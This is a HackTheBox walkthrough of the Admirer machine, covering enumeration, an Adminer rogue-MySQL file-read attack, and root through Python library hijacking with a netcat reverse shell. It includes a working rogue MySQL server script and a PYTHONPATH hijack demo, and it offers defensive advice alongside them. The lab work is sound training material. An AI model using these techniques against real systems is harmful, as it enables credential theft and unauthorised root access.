Admirer HackTheBox WalkThrough
This is the Admirer HackTheBox walkthrough. In this writeup I have demonstrated, step by step, how I rooted the Admirer HackTheBox machine. First, something about the machine: it is a Linux box with IP address 10.10.10.187, rated easy by its maker.
Before starting, connect your PC to the VPN and confirm connectivity with the Admirer machine by pinging 10.10.10.187. If all is well, start hacking. As usual, I began by scanning the box. Scanning gives an idea of how to proceed: it helps with banner grabbing the services running on the different ports and sometimes with vulnerability scanning.
Nmap (a port scanner) gave the following result:-
$ nmap -sV -sC -oN admirer_scan 10.10.10.187
Nmap revealed that ports 21, 22 and 80 are open: vsftpd on port 21, SSH on port 22 and an Apache2 web server on port 80. I searched for public exploits for vsftpd 3.0.3 with the searchsploit tool, but no exploit exists for this version of vsftpd. I tried an anonymous FTP login with the username anonymous, but the login failed. I left it there and moved on to further enumeration. Port 80 is open, so there may be a website hosted on the Apache2 web server running on it. Browsing to http://10.10.10.187/ gave a web page containing a large number of images.
I tried to enumerate more on this page but got no hint; even the page source gave nothing useful. I checked the robots.txt file and found a disallowed folder named admin-dir and a user named waldo. I added this user to my notes as a potential user. The robots.txt file also hinted at a creds file inside admin-dir. As soon as I had these hints about the important files, I fuzzed for them, assuming they might be text files.
$wfuzz -c -w /opt/SecLists-master/Discovery/Web-Content/big.txt --sc 200 -u http://10.10.10.187/admin-dir/FUZZ.txt -t 50
Both files contain many credentials along with lots of potential usernames and passwords. The useful credentials for us are the FTP account credentials, because port 21 is open with an FTP server running on it. I used the FTP credentials found in the files in the next step.
Login to FTP Account
$ ftp 10.10.10.187
Got two files, dump.sql and html.tar.gz, inside the ftp directory. I downloaded them to my local machine with the mget ftp command to enumerate them further.
ftp> mget dump.sql html.tar.gz //To download both files to local machine
After enumerating the contents of all the downloaded files, I got the following useful information: the database name, and a database username and password. So we have database credentials. But port 3306 is not open on the Admirer machine (confirmed by the nmap scan), so we cannot connect to the database remotely, and the credentials seem useless for now. Reading the file db_admin.php carefully gave a hint:
// TODO: Finish implementing this or find a better open source alternative.
I then tried fuzzing for file names with wfuzz, using the php, txt and html extensions:
$wfuzz -c -w /opt/SecLists-master/Discovery/Web-Content/big.txt -z list,php-txt-html --hc 403,404 -t 100 -u http://10.10.10.187/utility-scripts/FUZZ.FUZ2Z
Fuzzing listed three files, among them phptest.php and adminer.php. Going to http://10.10.10.187/utility-scripts/adminer.php showed the login panel of Adminer (a web-based database administration tool written in PHP, much like phpMyAdmin) along with the installed version, 4.6.2. As soon as I had the software name and version, I searched for a public exploit. Googling 'adminer 4.6.2 exploit' gave this article on the first page of the results; for details of how the vulnerability works, read that article.
A snippet on how this exploit works is attached below. In short: Adminer 4.6.2 lets a user point it at any MySQL server they choose, and the MySQL protocol allows a server to ask the client for a file (the mechanism behind LOAD DATA LOCAL INFILE). An attacker-controlled server therefore makes the web host, which is the MySQL client here, read a file from its own filesystem and send it back.
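The following is an added example, written for this page and not taken from the original post or from Adminer, that shows the protocol mechanism behind the attack. The walkthrough below uses a real MariaDB and types LOAD DATA LOCAL INFILE by hand; the protocol itself goes further. After any query at all, a server may answer with a LOCAL INFILE request (a packet whose payload starts with 0xFB followed by a path), and a client built with CLIENT_LOCAL_FILES enabled reads that file from its own disk and sends it to the server. The rogue server here does exactly that. The victim side is a minimal simulated MySQL client (an assumption standing in for a real client library), the target file is a constructed sample, and everything runs on 127.0.0.1.

```python
"""Rogue MySQL server that pulls a file from the connecting client.

The client here is a simulated stand-in for a MySQL client library with
CLIENT_LOCAL_FILES enabled; the file it hands over is a constructed sample.
"""
import os
import socket
import struct
import tempfile
import threading

CLIENT_LOCAL_FILES = 0x80           # both sides agree LOAD DATA LOCAL is allowed
CLIENT_PROTOCOL_41 = 0x200
CLIENT_SECURE_CONNECTION = 0x8000
CAPS = CLIENT_LOCAL_FILES | CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION

# OK packet: header 0x00, affected rows 0, last insert id 0, status (autocommit), warnings
OK_PACKET = b"\x00\x00\x00" + struct.pack("<HH", 2, 0)


def frame(seq, payload):
    """MySQL packet framing: 3-byte little-endian length, 1-byte sequence id, payload."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed connection")
        buf += chunk
    return buf


def read_packet(sock):
    """Return (sequence id, payload) of the next packet."""
    hdr = recv_exact(sock, 4)
    return hdr[3], recv_exact(sock, int.from_bytes(hdr[:3], "little"))


def handshake_v10():
    """Initial greeting (protocol 10) from the rogue server, advertising CLIENT_LOCAL_FILES."""
    return (b"\x0a" + b"5.7.0-rogue\x00" + struct.pack("<I", 1)   # version, connection id
            + b"A" * 8 + b"\x00"                                  # auth data part 1, filler
            + struct.pack("<H", CAPS & 0xFFFF) + b"\x21"          # capabilities low, charset
            + struct.pack("<H", 2)                                # status flags: autocommit
            + struct.pack("<H", CAPS >> 16) + b"\x00"             # capabilities high, no plugin auth
            + b"\x00" * 10 + b"B" * 12 + b"\x00")                 # reserved, auth data part 2


def rogue_server(listener, wanted_file, result):
    """Accept one victim connection and fetch `wanted_file` from the victim's disk."""
    conn, _ = listener.accept()
    with conn:
        conn.sendall(frame(0, handshake_v10()))
        seq, _ = read_packet(conn)                   # HandshakeResponse: credentials are irrelevant
        conn.sendall(frame(seq + 1, OK_PACKET))      # "login" always succeeds
        seq, query = read_packet(conn)               # whatever COM_QUERY the victim sends
        result["query"] = query[1:].decode(errors="replace")
        # Instead of a result set, answer with a LOCAL INFILE request: 0xFB + path.
        conn.sendall(frame(seq + 1, b"\xfb" + wanted_file.encode()))
        data = b""
        while True:                                  # file content packets, then an empty one
            seq, payload = read_packet(conn)
            if not payload:
                break
            data += payload
        conn.sendall(frame(seq + 1, OK_PACKET))
        result["file"] = data


def victim_client(port, query):
    """Minimal stand-in for a MySQL client library with CLIENT_LOCAL_FILES on (constructed)."""
    with socket.create_connection(("127.0.0.1", port)) as s:
        seq, _ = read_packet(s)                      # server greeting
        response = (struct.pack("<II", CAPS, 1 << 24) + b"\x21" + b"\x00" * 23
                    + b"dkm\x00" + b"\x00")           # HandshakeResponse41: user, empty auth
        s.sendall(frame(seq + 1, response))
        _, reply = read_packet(s)
        if reply[0] != 0x00:
            raise RuntimeError("login refused")
        s.sendall(frame(0, b"\x03" + query.encode()))  # COM_QUERY
        seq, reply = read_packet(s)
        if reply[0] == 0xFB:                         # server asks for a local file: comply
            with open(reply[1:].decode(), "rb") as f:
                content = f.read()                   # real clients split files > 16 MiB
            s.sendall(frame(seq + 1, content))
            s.sendall(frame(seq + 2, b""))           # empty packet ends the transfer
            read_packet(s)                           # final OK


def run_demo():
    """Create a constructed sample index.php, run both sides, return what the server received."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "index.php")
        with open(target, "wb") as f:
            f.write(b"<?php $db_pass = 'constructed-sample-password'; ?>\n")
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.bind(("127.0.0.1", 0))
        listener.listen(1)
        result = {}
        t = threading.Thread(target=rogue_server, args=(listener, target, result))
        t.start()
        victim_client(listener.getsockname()[1], "SELECT 1")
        t.join()
        listener.close()
        return result


if __name__ == "__main__":
    print(run_demo()["file"].decode())
```

The victim only sent SELECT 1; the server chose the file. This is why the fix on the client side is to disable CLIENT_LOCAL_FILES (MySQL's local_infile option) unless it is really needed, and why a web application must never let users pick the database host.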
To exploit this vulnerability I did the following things: –
Configure MySQL Server
1. Installed the MySQL server on my local machine (MariaDB is present in Kali by default). On other distros, use the command below to install it.
$apt install default-mysql-server
2. Started MySQL service
$systemctl start mysql
3. Logged in to the MySQL server as root. The default root password is blank; on recent Kali/Debian builds the local root account uses unix_socket authentication, so run sudo mysql instead of typing a password.
4. Created a new user dkm that may connect from any host ('%'), since the Admirer box will connect back to this server as that user.
MariaDB [(none)]> CREATE USER 'dkm'@'%' IDENTIFIED BY 'mypassword';
5. Granted all privileges to the user dkm (more than the attack strictly needs, but the simplest choice for a throwaway lab server).
MariaDB [(none)]> GRANT ALL PRIVILEGES ON *.* TO 'dkm'@'%';
6. Reload all privileges.
MariaDB [(none)]> FLUSH PRIVILEGES;
7. Created a database admirer and a table test inside it to receive the contents of the loaded file.
MariaDB [(none)]> create database admirer;
MariaDB [(none)]> use admirer;
MariaDB [admirer]> create table test(name varchar(255));
MariaDB [admirer]> exit;
8. Allowed remote hosts to connect by changing bind-address from 127.0.0.1 to 0.0.0.0 in the 50-server.cnf server configuration file. This exposes the server, together with an ALL PRIVILEGES account, on every interface; binding it to the tun0 address only, and reverting the change once the box is done, is the safer choice.
9. Restart MySQL Server to apply the changes
$systemctl restart mysql
10. Confirmed connectivity by logging in as user dkm with password mypassword. Note that -h localhost goes through the Unix socket, so to prove the network path that the box will use, connect to the tun0 address instead (for example -h 10.10.14.14).
$mysql -u'dkm' -p'mypassword' -h localhost
11. Finally, logged in to the Adminer panel at http://10.10.10.187/utility-scripts/adminer.php with the newly created user's credentials: server 10.10.14.14 (my tun0 IP), username dkm, password mypassword, database admirer.
After login, select SQL command in the left pane and run the following statement to load the site's index.php into the test table (the path ../index.php resolves relative to the Adminer script in utility-scripts, i.e. it is the web root's index.php):
load data local infile '../index.php'
into table test
fields terminated by "\n"
For more info about
load data, you can read here.
After the statement executes successfully, click select in the left pane to list the contents of the test table, which now holds the loaded file. A snippet of index.php as loaded is given below.
From the above file I extracted credentials. According to the file they are for accessing the admirer database, but no port is listening for database connections (confirmed through the nmap scan). So I tried the same credentials for SSH as user waldo and logged in successfully: the database password had been reused for the system account.
Gaining User Access
$ ssh waldo@10.10.10.187
$ whoami && id
Capture User Flag
Finding PrivEsc Vector
The sudo -l command revealed that:
User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh
In other words, user waldo may run the admin_tasks.sh script as root, and the SETENV tag means variables set on the sudo command line (such as PYTHONPATH) are passed through to the script instead of being stripped by sudo's env_reset.
Since waldo can run admin_tasks.sh with root privilege, every file or command executed from inside the script runs as root as well. The backup_web() function in admin_tasks.sh calls backup.py, which lives in /opt/scripts/, so when we run the script with sudo, backup.py is executed as root too. backup.py imports the shutil library, and Python resolves imports by walking sys.path, which PYTHONPATH is prepended to; because SETENV lets us pass PYTHONPATH through sudo, a file named shutil.py in a directory we control is imported instead of the standard-library module. That is Python library hijacking, and it is our privilege escalation vector. Check this article for more info about PLH.
To perform the hijack and get a root shell, I started a netcat listener in one terminal:
$nc -nvlp 1234
And ran the following in another terminal, where shutil.py contains a reverse shell back to my listener on port 1234, then chose the backup option so that backup.py runs:
$ mkdir /tmp/ethicalhacs
$ nano /tmp/ethicalhacs/shutil.py
$ cat /tmp/ethicalhacs/shutil.py
$ sudo PYTHONPATH=/tmp/ethicalhacs /opt/scripts/admin_tasks.sh
~Choose an option: 6
Running the backup task as root imported our shutil.py, and the reverse shell connected back to the listener as root: we have successfully escalated privileges by Python library hijacking.
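An added example, written for this page and not taken from the original post or from the box's own scripts, that demonstrates the mechanism used above: a fake shutil.py placed first on PYTHONPATH shadows the standard-library module when a victim script imports it, and the module body runs at import time, which is where a real payload would spawn the reverse shell. To keep it runnable offline the payload only writes a marker file; the victim script, the marker file name and the HIJACK_MARKER variable are constructed for this demo. sudo is not involved here: on the box, the SETENV tag is what lets PYTHONPATH survive sudo's environment reset.

```python
"""Python library hijacking via PYTHONPATH, with a harmless marker-file payload."""
import os
import subprocess
import sys
import tempfile

# Stand-in for the malicious shutil.py (constructed for this demo). A real one would
# start a reverse shell here at import time and keep stubs of the functions the victim
# calls so the script does not crash before or after the payload fires.
FAKE_SHUTIL = """\
import os
with open(os.environ["HIJACK_MARKER"], "w") as fh:
    fh.write("shutil.py hijacked inside pid %d" % os.getpid())
def make_archive(*args, **kwargs):   # stub so a caller using shutil keeps running
    return None
"""

# Constructed stand-in for backup.py: import shutil and report which file was loaded.
VICTIM = "import shutil; print(shutil.__file__)"


def import_location(pythonpath_dir, marker):
    """Run the victim in a fresh interpreter, with or without PYTHONPATH set, and
    return the path of the shutil module it actually imported."""
    env = dict(os.environ, HIJACK_MARKER=marker)
    env.pop("PYTHONPATH", None)                     # clean baseline
    if pythonpath_dir is not None:
        env["PYTHONPATH"] = pythonpath_dir          # attacker-controlled directory first
    out = subprocess.run([sys.executable, "-c", VICTIM], env=env,
                         capture_output=True, text=True, check=True)
    return out.stdout.strip()


def demo():
    """Compare a hijacked run against a clean run of the same victim script."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "shutil.py"), "w") as fh:
            fh.write(FAKE_SHUTIL)
        marker_hijacked = os.path.join(d, "marker-hijacked")
        marker_clean = os.path.join(d, "marker-clean")
        ours = os.path.realpath(d)
        hijacked_path = os.path.realpath(import_location(d, marker_hijacked))
        clean_path = os.path.realpath(import_location(None, marker_clean))
        return {
            # payload ran because our shutil.py was imported first
            "hijacked": os.path.exists(marker_hijacked),
            "hijacked_path_in_our_dir": hijacked_path.startswith(ours),
            # without PYTHONPATH the standard-library shutil wins and nothing fires
            "clean": not os.path.exists(marker_clean),
            "clean_path_in_our_dir": clean_path.startswith(ours),
        }


if __name__ == "__main__":
    print(demo())
```

The defence follows directly from the mechanism: do not grant SETENV (or env_keep entries such as PYTHONPATH) in sudoers for commands that run interpreters, run privileged Python with -I or -E so PYTHONPATH is ignored, and keep the directories on sys.path root-owned and non-writable.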
Capture Root Flag
This was how I rooted the Admirer HackTheBox machine. Thanks for reading this walkthrough. I learnt a lot from rooting this box, and I hope you have learnt something new as well. Feel free to share your experience in the comment section. For any query or suggestion related to the walkthrough, feel free to write to us at ethi[email protected].